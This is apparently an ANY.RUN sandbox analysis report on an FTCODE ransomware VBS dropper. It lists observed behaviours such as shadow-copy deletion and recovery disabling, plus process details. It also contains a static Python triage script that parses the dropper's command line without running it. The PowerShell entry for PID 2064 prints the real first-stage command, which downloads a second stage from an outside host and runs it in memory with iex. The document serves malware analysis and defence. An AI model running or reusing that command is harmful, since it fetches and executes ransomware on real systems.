General Info

File name
Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs
Full analysis
https://app.any.run/tasks/9aac9974-ac45-4cf2-bef5-2dd100b77c8e
Verdict
Malicious activity
Analysis date
10/9/2019, 16:18:56
OS
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags
trojan
ransomware
ftcode
MIME
text/plain
File info
ASCII text, with CRLF, LF line terminators
MD5
be611918fabc12048aeba6e55f6559d7
SHA1
4cb525212460fedae4820a7cfc39e47db48c4c7b
SHA256
07c226d6e4ab84a586b1a09f09896223412de927513fda6bf13b031dc497e686
SSDEEP
48:KudJXRRAiRESdFZyRkRR8IRHRQRJf8i+:tdJBRAyTZCYR8sxEJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
475 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
on
Network geolocation
IT
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
  • Mozilla Maintenance Service (67.0.4)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

Renames files like Ransomware
  • powershell.exe (PID: 2064)
Deletes shadow copies
  • cmd.exe (PID: 792)
  • cmd.exe (PID: 2644)
Uses Task Scheduler to run other applications
  • powershell.exe (PID: 2064)
Writes to a start menu file
  • powershell.exe (PID: 2064)
Loads the Task Scheduler COM API
  • schtasks.exe (PID: 876)
FTCODE was detected
  • powershell.exe (PID: 2064)
Starts BCDEDIT.EXE to disable recovery
  • cmd.exe (PID: 1580)
Creates files like Ransomware instruction
  • powershell.exe (PID: 2064)
Reads the machine GUID from the registry
  • WinRAR.exe (PID: 2940)
  • powershell.exe (PID: 2064)
  • vlc.exe (PID: 2096)
  • WScript.exe (PID: 2104)
Starts CMD.EXE for commands execution
  • powershell.exe (PID: 2064)
Executes PowerShell scripts
  • WScript.exe (PID: 2104)
Creates files in the user directory
  • powershell.exe (PID: 2064)
  • vlc.exe (PID: 2096)
Dropped object may contain Bitcoin addresses
  • IEXPLORE.EXE (PID: 2484)
Manual execution by user
  • iexplore.exe (PID: 2172)
  • NOTEPAD.EXE (PID: 2996)
  • WinRAR.exe (PID: 2940)
Dropped object may contain URL to Tor Browser
  • powershell.exe (PID: 2064)
Reads settings of System Certificates
  • iexplore.exe (PID: 2172)
  • IEXPLORE.EXE (PID: 2484)
  • powershell.exe (PID: 2064)
Dropped object may contain TOR URL's
  • powershell.exe (PID: 2064)
Reads internet explorer settings
  • IEXPLORE.EXE (PID: 2484)
Changes internet zones settings
  • iexplore.exe (PID: 2172)
Reads Internet Cache Settings
  • iexplore.exe (PID: 2172)
Creates files in the user directory
  • iexplore.exe (PID: 2172)
  • IEXPLORE.EXE (PID: 2484)
Reads the machine GUID from the registry
  • iexplore.exe (PID: 2172)

Find more information about signature artifacts and the mapping to the MITRE ATT&CK™ matrix in the full report.

Processes

Total processes
70
Monitored processes
20
Malicious processes
4
Suspicious processes
0

Behavior graph

Process nodes in launch order (a node marked "no specs" has none of the specs listed below):

  • start wscript.exe (no specs)
  • #STOP powershell.exe
  • vlc.exe
  • schtasks.exe (no specs)
  • cmd.exe (no specs)
  • cmd.exe (no specs)
  • cmd.exe (no specs)
  • bcdedit.exe (no specs)
  • cmd.exe (no specs)
  • bcdedit.exe (no specs)
  • cmd.exe (no specs)
  • wbadmin.exe (no specs)
  • cmd.exe (no specs)
  • wbadmin.exe (no specs)
  • wbadmin.exe (no specs)
  • vssadmin.exe (no specs)
  • winrar.exe (no specs)
  • iexplore.exe
  • iexplore.exe
  • notepad.exe (no specs)

Specs description (markers that can be attached to a graph node)

  • Program did not start
  • Integrity level elevation
  • Task contains an error or was rebooted
  • Process has crashed
  • Task contains several apps running
  • Executable file was dropped
  • Debug information is available
  • Process was injected
  • Network attacks were detected
  • Application downloaded the executable file
  • Actions similar to stealing personal data
  • Behavior similar to exploiting the vulnerability
  • Inspected object has suspicious PE structure
  • File is detected by antivirus software
  • CPU overrun
  • RAM overrun
  • Process starts the services
  • Process was added to the startup
  • Behavior similar to spam
  • Low-level access to the HDD
  • Probably Tor was used
  • System was rebooted
  • Connects to the network
  • Known threat

Process information

PID
2104
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll

PID
2064
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = $env:temp + '\ramst007.mp3';(New-Object Net.WebClient).DownloadFile('https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); Start-Process $a;iex ((New-Object Net.WebClient).DownloadString('http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643'));
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\program files\videolan\vlc\vlc.exe
c:\windows\system32\schtasks.exe
c:\windows\system32\sxs.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.security\9ce308135fc7c9d6f24c6f8f66fad6f0\system.security.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.web\89d278aee76905ee8d74787e3d970e98\system.web.ni.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wininet.dll
c:\windows\microsoft.net\framework64\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
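The command line of PID 2064 above is the whole first stage in one line: it builds a path under %TEMP%, pulls an MP3 from archive.org with DownloadFile and opens it with Start-Process (which is why vlc.exe, PID 2096, appears as a child), then fetches the real second stage with DownloadString and runs it in memory with iex. For triage the DownloadString URL is the indicator that matters; the MP3 is public content. The Python below is an added example, not code from ANY.RUN or from the sample: it parses that command line as text (nothing is fetched or executed), splits it into statements, resolves the $env:temp assignment and reports the URLs, the drop path and the stage order. The %TEMP% value is an assumption taken from the vlc.exe command line in this report.

```python
"""Static triage of the PowerShell one-liner from PID 2064 (added example)."""
import re
from dataclasses import dataclass

# Copied verbatim from the report's process entry for PID 2064.
CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r"$a = $env:temp + '\ramst007.mp3';"
    r"(New-Object Net.WebClient).DownloadFile("
    r"'https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); "
    r"Start-Process $a;"
    r"iex ((New-Object Net.WebClient).DownloadString("
    r"'http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643'));"
)

# Assumed sandbox environment: %TEMP% is taken from the vlc.exe command line in this report.
SANDBOX_ENV = {"temp": r"C:\Users\admin\AppData\Local\Temp"}


@dataclass
class Stage:
    kind: str   # download_file | start_process | download_string_iex | download_string
    url: str
    path: str


def strip_host(cmdline: str) -> str:
    """Drop the quoted powershell.exe image path and keep the inline script."""
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        if end != -1:
            return cmdline[end + 1:].strip()
    return cmdline


def split_statements(script: str) -> list:
    """Split on ';' only outside quotes and parentheses so URLs and nested
    (New-Object ...) calls are not cut in half."""
    out, buf, quote, depth = [], [], None, 0
    for ch in script:
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == ";" and depth == 0:
            stmt = "".join(buf).strip()
            if stmt:
                out.append(stmt)
            buf = []
            continue
        buf.append(ch)
    tail = "".join(buf).strip()
    if tail:
        out.append(tail)
    return out


ASSIGN_RE = re.compile(r"^\$(\w+)\s*=\s*\$env:(\w+)\s*\+\s*'([^']*)'$", re.I)
DOWNLOAD_FILE_RE = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*\$(\w+)\s*\)", re.I)
DOWNLOAD_STRING_RE = re.compile(r"\.DownloadString\(\s*'([^']+)'\s*\)", re.I)
START_RE = re.compile(r"\bStart-Process\s+\$(\w+)", re.I)
IEX_RE = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)


def resolve_assignments(statements, env) -> dict:
    """Resolve `$var = $env:NAME + '<suffix>'` to a concrete path using env."""
    resolved = {}
    for stmt in statements:
        m = ASSIGN_RE.match(stmt)
        if m:
            var, env_name, suffix = m.groups()
            base = env.get(env_name.lower())
            resolved[var] = (base + suffix) if base is not None else "%" + env_name + "%" + suffix
    return resolved


def triage(cmdline: str, env=SANDBOX_ENV) -> dict:
    statements = split_statements(strip_host(cmdline))
    variables = resolve_assignments(statements, env)
    stages = []
    for stmt in statements:
        if (m := DOWNLOAD_FILE_RE.search(stmt)):
            url, var = m.groups()
            stages.append(Stage("download_file", url, variables.get(var, "$" + var)))
        elif (m := START_RE.search(stmt)):
            var = m.group(1)
            stages.append(Stage("start_process", "", variables.get(var, "$" + var)))
        elif (m := DOWNLOAD_STRING_RE.search(stmt)):
            kind = "download_string_iex" if IEX_RE.search(stmt) else "download_string"
            stages.append(Stage(kind, m.group(1), ""))
    return {
        "urls": [s.url for s in stages if s.url],
        "dropped_files": sorted({s.path for s in stages if s.kind == "download_file"}),
        "stages": [s.kind for s in stages],
        # The stage that never touches disk is the one to hunt for in proxy logs.
        "in_memory_stage": next((s.url for s in stages if s.kind == "download_string_iex"), None),
    }


if __name__ == "__main__":
    for key, value in triage(CMDLINE).items():
        print(f"{key}: {value}")
```

The statement splitter tracks quotes and parentheses rather than splitting on every ';', because a second-stage URL can legitimately contain one; a regex over the raw line would also miss the drop path, which only exists after the $env:temp assignment is resolved.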

PID
2096
CMD
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\AppData\Local\Temp\ramst007.mp3"
Path
C:\Program Files\VideoLAN\VLC\vlc.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
VideoLAN
Description
VLC media player
Version
2.2.6
Modules
Image
c:\program files\videolan\vlc\vlc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\videolan\vlc\libvlc.dll
c:\program files\videolan\vlc\libvlccore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\program files\videolan\vlc\plugins\access\libdshow_plugin.dll
c:\windows\system32\oleaut32.dll
c:\program files\videolan\vlc\plugins\audio_output\libdirectsound_plugin.dll
c:\program files\videolan\vlc\plugins\audio_output\libwaveout_plugin.dll
c:\program files\videolan\vlc\plugins\video_output\libdirect3d_plugin.dll
c:\program files\videolan\vlc\plugins\video_output\libdirectdraw_plugin.dll
c:\windows\system32\dsound.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\program files\videolan\vlc\plugins\control\libwin_msg_plugin.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\uxtheme.dll
c:\program files\videolan\vlc\plugins\control\libhotkeys_plugin.dll
c:\program files\videolan\vlc\plugins\access\libvdr_plugin.dll
c:\program files\videolan\vlc\plugins\control\libwin_hotkeys_plugin.dll
c:\program files\videolan\vlc\plugins\access\libfilesystem_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\libsmooth_plugin.dll
c:\program files\videolan\vlc\plugins\gui\libqt4_plugin.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\wsock32.dll
c:\program files\videolan\vlc\plugins\stream_filter\libhttplive_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\libdash_plugin.dll
c:\program files\videolan\vlc\plugins\access\libzip_plugin.dll
c:\program files\videolan\vlc\plugins\access\librar_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\librecord_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libes_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libtheora_plugin.dll
c:\program files\videolan\vlc\plugins\codec\librawvideo_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libspeex_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libvorbis_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libaes3_plugin.dll
